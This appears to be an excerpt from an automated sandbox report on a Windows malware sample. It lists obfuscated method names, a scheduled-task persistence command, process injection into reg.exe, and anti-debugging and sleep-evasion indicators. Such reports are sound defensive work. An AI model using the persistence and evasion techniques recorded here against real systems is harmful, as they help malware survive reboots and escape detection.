            Source: 0.2.jlsvOH1c8bSRKqM.exe.4338f30.2.raw.unpack, gjgmXoAXn4tWbfndxk.cs | High entropy of concatenated method names: 'sEGigaUykT', 'eOLivNltwa', 'op8iAkJDuw', 'qC1iIAg347', 'OtgipFkaBJ', 'oLLijURYrU', 'HrciJ2HKJ7', 'I6ViaB3nYO', 'qBRi4CS5ED', 'u5PiTKRZuc'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.4338f30.2.raw.unpack, webBCGxs4cEidVqfoA.cs | High entropy of concatenated method names: 'M5DuAgNgB7', 'uhvuIAmwrT', 'BDQufFxBGJ', 'Ha3uKg2eFf', 'HxTuW3lbUT', 'YAXuZsAqp2', 'oGBudNIyTX', 'S5cucniZ2y', 'h8Du2nJWj2', 'Hi1uHcMcOA'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.4338f30.2.raw.unpack, pfKX9pTyV9AHnv1emj.cs | High entropy of concatenated method names: 'OWdCtNiuv5', 'SOqCYwBnKO', 'd8xCyXLbOU', 'JNgyHGuydu', 'W09yzdVkZe', 'kO8CwsIiEm', 'cZfCs0UOLa', 'JScChP330W', 'WHaCLZkWTt', 'ASeCXUbgWp'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.4338f30.2.raw.unpack, JZ2ny8fI1YmI7oWLrL.cs | High entropy of concatenated method names: 'ToString', 'y98DEl2lK1', 'tVQDpWCvKX', 'w8mDjMRDdQ', 'HKWDJWA09y', 'zSZDawp5ur', 'P4FD44sDHD', 'bXsDTsecTf', 'IusD3aKGkA', 'AecDrOVogl'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.4338f30.2.raw.unpack, IhRO8Tsw4lT9Fs7fuvm.cs | High entropy of concatenated method names: 'YOqn1fPqlW', 'IKUn8t9GfF', 'PinnohFcQY', 'E2AnejYVeD', 'mfZnlNYlMN', 'kC6n7ftKOh', 'uWhnOpU214', 'K5nnxKbrIH', 'aXnn9KYxVu', 'NO5nkIi5is'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.4338f30.2.raw.unpack, VkxmdCPh0dF91gyE8L.cs | High entropy of concatenated method names: 'mOEySM2xGm', 'TPAyuVgrBj', 'ABLyqEGCDa', 'kyOyCceOMu', 'qjky64rEgL', 'SpVqWd58EI', 'NGHqZRyulM', 'V23qdvYQuj', 'f4cqcFv4cA', 'VpQq2vvhb9'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.4338f30.2.raw.unpack, m7ehKDuvw5GaO3SAiB.cs | High entropy of concatenated method names: 'Dispose', 'aVcs2wccPR', 'D4qhp6FJrl', 'U67ffATqBq', 'QgRsHUbpUT', 'OCcsz64q02', 'ProcessDialogKey', 'UF2hwTijwf', 'u1UhsSfxTU', 'koqhhZF30a'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.4338f30.2.raw.unpack, L2K7nbzRb5MnTUOUu0.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'SBLn5685OY', 'hPInibMbeK', 'jm2nDmclI1', 'NnunmLIZBE', 'W4anNXwWef', 'vNrnnAPvbH', 'IpnnFa23xN'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.4338f30.2.raw.unpack, ORUbpUcTECc64q02WF.cs | High entropy of concatenated method names: 'WqbNtu2PR9', 'bhqNuZMXqS', 'sesNYXO3cK', 'Fs8NqhZrPN', 'wd0NyjIJ3t', 'YVwNCeptVR', 'j4lN6S7dFj', 'P7rNBVduGP', 'AhxNbZh6nd', 'bV4NRJBMPA'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.4338f30.2.raw.unpack, Vfq87d0qyfa9UN0Y3r.cs | High entropy of concatenated method names: 's5f5xKkSPd', 'br559CEXyk', 'z3U5PFPKOe', 'u1D5pIB2jr', 'auw5JPKkIo', 'wSs5aVRLYq', 'xtO5Tj2Bj9', 'UPY53iY3vA', 'i8O5gdNeNO', 'cbi5EfJibe'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.4338f30.2.raw.unpack, R43ntJ9WlnGQu3XYW2.cs | High entropy of concatenated method names: 'MZVYeFbD63', 'rlWY7htTrA', 'ToJYxIMhc6', 'HX7Y9Exf17', 'ILqYieMTAf', 'H9oYDjTvY3', 'jthYmxTLuc', 'FWQYNSQ1J2', 'BbqYnqr4B1', 'x6qYFRhW47'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.4338f30.2.raw.unpack, ekiVxK6VuR4OQnevN0.cs | High entropy of concatenated method names: 'lx3LSQA9nb', 'kwQLtL1AZo', 'QBTLued96p', 'pbkLYoWOYn', 'GkSLqQpdGZ', 'MRsLyTZ6eF', 'cidLCkdyvt', 'KB1L6oy3mk', 'DykLB2RKK4', 'XiiLb0RwMO'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.4338f30.2.raw.unpack, COQHp4sLPuyvhXixHFc.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'HvRFAvvRZN', 'd1uFI4KCEt', 'eM4Ffyhxvp', 'JnXFK2OUhw', 'uReFWBLJY0', 'yxJFZgrDqx', 'Lg7FdTFrdl'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.4338f30.2.raw.unpack, govCQSXA7pTF7U4miR.cs | High entropy of concatenated method names: 'kwQsCebBCG', 'b4cs6EidVq', 'IWlsbnGQu3', 'eYWsR2VUUk', 'kGqsiFZZkx', 'qdCsDh0dF9', 'X90vSAigQXuf48LRBn', 'bZxhrsDmkJgdnoaLOZ', 'IVwssZ4MdQ', 'sWksLWr7Xw'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.4338f30.2.raw.unpack, CNHbGRJjsbShBn9kCk.cs | High entropy of concatenated method names: 'qpsyVDsAcd', 'DQTy1wB96J', 'CZEyolmiVm', 'kCSye3SCHc', 'U3ty7wd5X0', 'CGPyOSkK8N', 'NAny9L5em2', 'zS8yk25419', 'NXOgAmurcV1XGxbqmhs', 'bRIjQvuL6oovgJppWVJ'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.4338f30.2.raw.unpack, XjaMkDreeAEx2QyBUh.cs | High entropy of concatenated method names: 'nhlC1u79iv', 'qIWC8JQmnG', 'nYFCo6bWNC', 'M2XCe52vyx', 'BfmClIJltB', 'JeiC73xqFF', 'oVyCOMP5Gw', 'F8aCxHCQYG', 'yncC9WAIoH', 'PBcCkVrYSm'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.4338f30.2.raw.unpack, FNDhjfKOXWnfEgrOxW.cs | High entropy of concatenated method names: 'uDHmbNb44c', 'vMOmRjl1jW', 'ToString', 'MFYmtcF7Ip', 'IgPmuYEV60', 'GLAmYcdF13', 'NMjmqKu43A', 'fEtmy2XSLN', 'JNDmCf4mm7', 'Y2bm6uJyW4'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.4338f30.2.raw.unpack, VF30aAHoJ8tYtu7HW4.cs | High entropy of concatenated method names: 'goGnsJISGS', 'dkXnLdrne1', 'zx3nXCoAag', 'qifntkA5KF', 'nqtnueJQdh', 'PRYnq6Dvlf', 'iplnyMgocv', 'jEbNdcFQFI', 'HvYNcrgEh4', 'q52N2i9CrN'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.42b4b10.3.raw.unpack, picCfyhycqVC04P7lL.cs | High entropy of concatenated method names: 'ETVoNmy0E', 'YE2eacpgD', 'jSc75uJhr', 'LR4OUAKTW', 'ffc9u8HJl', 'jU6kgfxHp', 'JtKD8l6g7Ws4uldIaC', 'U9hcAhNp9IQNE8IAW6', 'Gk8NPtTtN', 'pTGFtHlYc'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.42b4b10.3.raw.unpack, b19wuHZr1gri9Sh9ho.cs | High entropy of concatenated method names: 'pMemcD7mJ4', 'LsymHWQDfc', 'pYUNwQhhth', 'PmXNs9NHdy', 'iHdmEMLWGg', 'JlAmv3ZrGZ', 'zLIm0EUurf', 'iVemAcqJLH', 'DEkmIvc4Co', 'BhomfUnk2a'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.42b4b10.3.raw.unpack, XTijwf2U1USfxTU6oq.cs | High entropy of concatenated method names: 'edJNPwZ0p2', 'hqxNpmHQ0j', 'WsdNjbO5Ip', 'w6dNJwvgQa', 'OWKNATmfdq', 'CITNaJeFgb', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.42b4b10.3.raw.unpack, gjgmXoAXn4tWbfndxk.cs | High entropy of concatenated method names: 'sEGigaUykT', 'eOLivNltwa', 'op8iAkJDuw', 'qC1iIAg347', 'OtgipFkaBJ', 'oLLijURYrU', 'HrciJ2HKJ7', 'I6ViaB3nYO', 'qBRi4CS5ED', 'u5PiTKRZuc'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.42b4b10.3.raw.unpack, webBCGxs4cEidVqfoA.cs | High entropy of concatenated method names: 'M5DuAgNgB7', 'uhvuIAmwrT', 'BDQufFxBGJ', 'Ha3uKg2eFf', 'HxTuW3lbUT', 'YAXuZsAqp2', 'oGBudNIyTX', 'S5cucniZ2y', 'h8Du2nJWj2', 'Hi1uHcMcOA'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.42b4b10.3.raw.unpack, pfKX9pTyV9AHnv1emj.cs | High entropy of concatenated method names: 'OWdCtNiuv5', 'SOqCYwBnKO', 'd8xCyXLbOU', 'JNgyHGuydu', 'W09yzdVkZe', 'kO8CwsIiEm', 'cZfCs0UOLa', 'JScChP330W', 'WHaCLZkWTt', 'ASeCXUbgWp'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.42b4b10.3.raw.unpack, JZ2ny8fI1YmI7oWLrL.cs | High entropy of concatenated method names: 'ToString', 'y98DEl2lK1', 'tVQDpWCvKX', 'w8mDjMRDdQ', 'HKWDJWA09y', 'zSZDawp5ur', 'P4FD44sDHD', 'bXsDTsecTf', 'IusD3aKGkA', 'AecDrOVogl'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.42b4b10.3.raw.unpack, IhRO8Tsw4lT9Fs7fuvm.cs | High entropy of concatenated method names: 'YOqn1fPqlW', 'IKUn8t9GfF', 'PinnohFcQY', 'E2AnejYVeD', 'mfZnlNYlMN', 'kC6n7ftKOh', 'uWhnOpU214', 'K5nnxKbrIH', 'aXnn9KYxVu', 'NO5nkIi5is'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.42b4b10.3.raw.unpack, VkxmdCPh0dF91gyE8L.cs | High entropy of concatenated method names: 'mOEySM2xGm', 'TPAyuVgrBj', 'ABLyqEGCDa', 'kyOyCceOMu', 'qjky64rEgL', 'SpVqWd58EI', 'NGHqZRyulM', 'V23qdvYQuj', 'f4cqcFv4cA', 'VpQq2vvhb9'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.42b4b10.3.raw.unpack, m7ehKDuvw5GaO3SAiB.cs | High entropy of concatenated method names: 'Dispose', 'aVcs2wccPR', 'D4qhp6FJrl', 'U67ffATqBq', 'QgRsHUbpUT', 'OCcsz64q02', 'ProcessDialogKey', 'UF2hwTijwf', 'u1UhsSfxTU', 'koqhhZF30a'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.42b4b10.3.raw.unpack, L2K7nbzRb5MnTUOUu0.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'SBLn5685OY', 'hPInibMbeK', 'jm2nDmclI1', 'NnunmLIZBE', 'W4anNXwWef', 'vNrnnAPvbH', 'IpnnFa23xN'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.42b4b10.3.raw.unpack, ORUbpUcTECc64q02WF.cs | High entropy of concatenated method names: 'WqbNtu2PR9', 'bhqNuZMXqS', 'sesNYXO3cK', 'Fs8NqhZrPN', 'wd0NyjIJ3t', 'YVwNCeptVR', 'j4lN6S7dFj', 'P7rNBVduGP', 'AhxNbZh6nd', 'bV4NRJBMPA'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.42b4b10.3.raw.unpack, Vfq87d0qyfa9UN0Y3r.cs | High entropy of concatenated method names: 's5f5xKkSPd', 'br559CEXyk', 'z3U5PFPKOe', 'u1D5pIB2jr', 'auw5JPKkIo', 'wSs5aVRLYq', 'xtO5Tj2Bj9', 'UPY53iY3vA', 'i8O5gdNeNO', 'cbi5EfJibe'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.42b4b10.3.raw.unpack, R43ntJ9WlnGQu3XYW2.cs | High entropy of concatenated method names: 'MZVYeFbD63', 'rlWY7htTrA', 'ToJYxIMhc6', 'HX7Y9Exf17', 'ILqYieMTAf', 'H9oYDjTvY3', 'jthYmxTLuc', 'FWQYNSQ1J2', 'BbqYnqr4B1', 'x6qYFRhW47'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.42b4b10.3.raw.unpack, ekiVxK6VuR4OQnevN0.cs | High entropy of concatenated method names: 'lx3LSQA9nb', 'kwQLtL1AZo', 'QBTLued96p', 'pbkLYoWOYn', 'GkSLqQpdGZ', 'MRsLyTZ6eF', 'cidLCkdyvt', 'KB1L6oy3mk', 'DykLB2RKK4', 'XiiLb0RwMO'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.42b4b10.3.raw.unpack, COQHp4sLPuyvhXixHFc.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'HvRFAvvRZN', 'd1uFI4KCEt', 'eM4Ffyhxvp', 'JnXFK2OUhw', 'uReFWBLJY0', 'yxJFZgrDqx', 'Lg7FdTFrdl'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.42b4b10.3.raw.unpack, govCQSXA7pTF7U4miR.cs | High entropy of concatenated method names: 'kwQsCebBCG', 'b4cs6EidVq', 'IWlsbnGQu3', 'eYWsR2VUUk', 'kGqsiFZZkx', 'qdCsDh0dF9', 'X90vSAigQXuf48LRBn', 'bZxhrsDmkJgdnoaLOZ', 'IVwssZ4MdQ', 'sWksLWr7Xw'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.42b4b10.3.raw.unpack, CNHbGRJjsbShBn9kCk.cs | High entropy of concatenated method names: 'qpsyVDsAcd', 'DQTy1wB96J', 'CZEyolmiVm', 'kCSye3SCHc', 'U3ty7wd5X0', 'CGPyOSkK8N', 'NAny9L5em2', 'zS8yk25419', 'NXOgAmurcV1XGxbqmhs', 'bRIjQvuL6oovgJppWVJ'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.42b4b10.3.raw.unpack, XjaMkDreeAEx2QyBUh.cs | High entropy of concatenated method names: 'nhlC1u79iv', 'qIWC8JQmnG', 'nYFCo6bWNC', 'M2XCe52vyx', 'BfmClIJltB', 'JeiC73xqFF', 'oVyCOMP5Gw', 'F8aCxHCQYG', 'yncC9WAIoH', 'PBcCkVrYSm'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.42b4b10.3.raw.unpack, FNDhjfKOXWnfEgrOxW.cs | High entropy of concatenated method names: 'uDHmbNb44c', 'vMOmRjl1jW', 'ToString', 'MFYmtcF7Ip', 'IgPmuYEV60', 'GLAmYcdF13', 'NMjmqKu43A', 'fEtmy2XSLN', 'JNDmCf4mm7', 'Y2bm6uJyW4'
            Source: 0.2.jlsvOH1c8bSRKqM.exe.42b4b10.3.raw.unpack, VF30aAHoJ8tYtu7HW4.cs | High entropy of concatenated method names: 'goGnsJISGS', 'dkXnLdrne1', 'zx3nXCoAag', 'qifntkA5KF', 'nqtnueJQdh', 'PRYnq6Dvlf', 'iplnyMgocv', 'jEbNdcFQFI', 'HvYNcrgEh4', 'q52N2i9CrN'

            Persistence and Installation Behavior

            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe | Process created: reg.exe
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe | Process created: reg.exe
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe | Process created: reg.exe
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe | Process created: reg.exe
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | File created: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe

            Boot Survival

            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AZJifQrhDpEQCA" /XML "C:\Users\user\AppData\Local\Temp\tmpB59F.tmp"

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe; Process information set: NOOPENFILEERRORBOX (42 identical entries)
            Source: C:\Windows\SysWOW64\reg.exe; Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX (5 identical entries)

            Malware Analysis System Evasion

            Source: Yara match; File source: Process Memory Space: jlsvOH1c8bSRKqM.exe PID: 7268, type: MEMORYSTR
            Source: Yara match; File source: Process Memory Space: AZJifQrhDpEQCA.exe PID: 7752, type: MEMORYSTR
            Source: C:\Windows\SysWOW64\reg.exe; API/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\reg.exe; API/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\reg.exe; API/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\reg.exe; API/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\reg.exe; API/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\reg.exe; API/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\reg.exe; API/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\reg.exe; API/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Memory allocated: 9D0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Memory allocated: 26B0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Memory allocated: C30000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Memory allocated: A160000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Memory allocated: B160000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Memory allocated: B3E0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Memory allocated: C3E0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Memory allocated: CA70000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Memory allocated: DA70000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Memory allocated: EA70000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe; Memory allocated: B00000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe; Memory allocated: 27F0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe; Memory allocated: 47F0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe; Memory allocated: 7450000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe; Memory allocated: 8450000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe; Memory allocated: 85F0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe; Memory allocated: 95F0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe; Memory allocated: 9930000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe; Memory allocated: 7450000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Code function: 8_2_017E096E rdtsc
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477 (4 identical entries)
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe; Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 3464
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 3421
            Source: C:\Windows\SysWOW64\reg.exe; Window / User API: threadDelayed 3051
            Source: C:\Windows\SysWOW64\reg.exe; Window / User API: threadDelayed 6921
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; API coverage: 0.7 %
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe; API coverage: 0.4 %
            Source: C:\Windows\SysWOW64\reg.exe; API coverage: 2.6 %
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe TID: 7288; Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7604; Thread sleep count: 3464 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7740; Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7700; Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7744; Thread sleep time: -2767011611056431s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7716; Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe TID: 7932; Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\reg.exe TID: 2484; Thread sleep count: 3051 > 30
            Source: C:\Windows\SysWOW64\reg.exe TID: 2484; Thread sleep time: -6102000s >= -30000s
            Source: C:\Windows\SysWOW64\reg.exe TID: 2484; Thread sleep count: 6921 > 30
            Source: C:\Windows\SysWOW64\reg.exe TID: 2484; Thread sleep time: -13842000s >= -30000s
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe TID: 7528; Thread sleep time: -75000s >= -30000s
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe TID: 7528; Thread sleep count: 32 > 30
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe TID: 7528; Thread sleep time: -48000s >= -30000s
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe TID: 7528; Thread sleep count: 33 > 30
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe TID: 7528; Thread sleep time: -33000s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Last function: Thread delayed
            Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed (2 identical entries)
            Source: C:\Windows\SysWOW64\reg.exe; Last function: Thread delayed (2 identical entries)
            Source: C:\Windows\SysWOW64\reg.exe; Code function: 17_2_02CEC070 FindFirstFileW,FindNextFileW,FindClose
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477 (4 identical entries)
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe; Thread delayed: delay time: 922337203685477
            Source: AZJifQrhDpEQCA.exe, 00000009.00000002.1775330764.0000000000C25000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:P
            Source: jlsvOH1c8bSRKqM.exe, 00000000.00000002.1697199208.0000000000C30000.00000004.08000000.00040000.00000000.sdmp; Binary or memory string: toUuGVMciQ
            Source: reg.exe, 00000011.00000002.4128479477.000000000308E000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll*)
            Source: DAGiwzvTYsMjq.exe, 00000017.00000002.4129225895.00000000011EF000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllss
            Source: firefox.exe, 00000018.00000002.2152960492.000002D6E504C000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll}}
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Process queried: DebugPort
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe; Process queried: DebugPort
            Source: C:\Windows\SysWOW64\reg.exe; Process queried: DebugPort (2 identical entries)
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Code function: 8_2_017E096E rdtsc
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Code function: 8_2_00417BD3 LdrLoadDll
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Code function: 8_2_01844180 mov eax, dword ptr fs:[00000030h] (2 identical entries)
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Code function: 8_2_0185C188 mov eax, dword ptr fs:[00000030h] (2 identical entries)
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Code function: 8_2_0182019F mov eax, dword ptr fs:[00000030h] (4 identical entries)
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Code function: 8_2_017A6154 mov eax, dword ptr fs:[00000030h] (2 identical entries)
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Code function: 8_2_0179C156 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Code function: 8_2_018661C3 mov eax, dword ptr fs:[00000030h] (2 identical entries)
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Code function: 8_2_0181E1D0 mov eax, dword ptr fs:[00000030h] (2 identical entries)
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Code function: 8_2_0181E1D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Code function: 8_2_0181E1D0 mov eax, dword ptr fs:[00000030h] (2 identical entries)
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Code function: 8_2_017D0124 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Code function: 8_2_018761E5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Code function: 8_2_017D01F8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Code function: 8_2_0184E10E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Code function: 8_2_0184E10E mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Code function: 8_2_0184E10E mov eax, dword ptr fs:[00000030h] (2 identical entries)
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe; Code function: 8_2_0184E10E mov ecx, dword ptr fs:[00000030h]
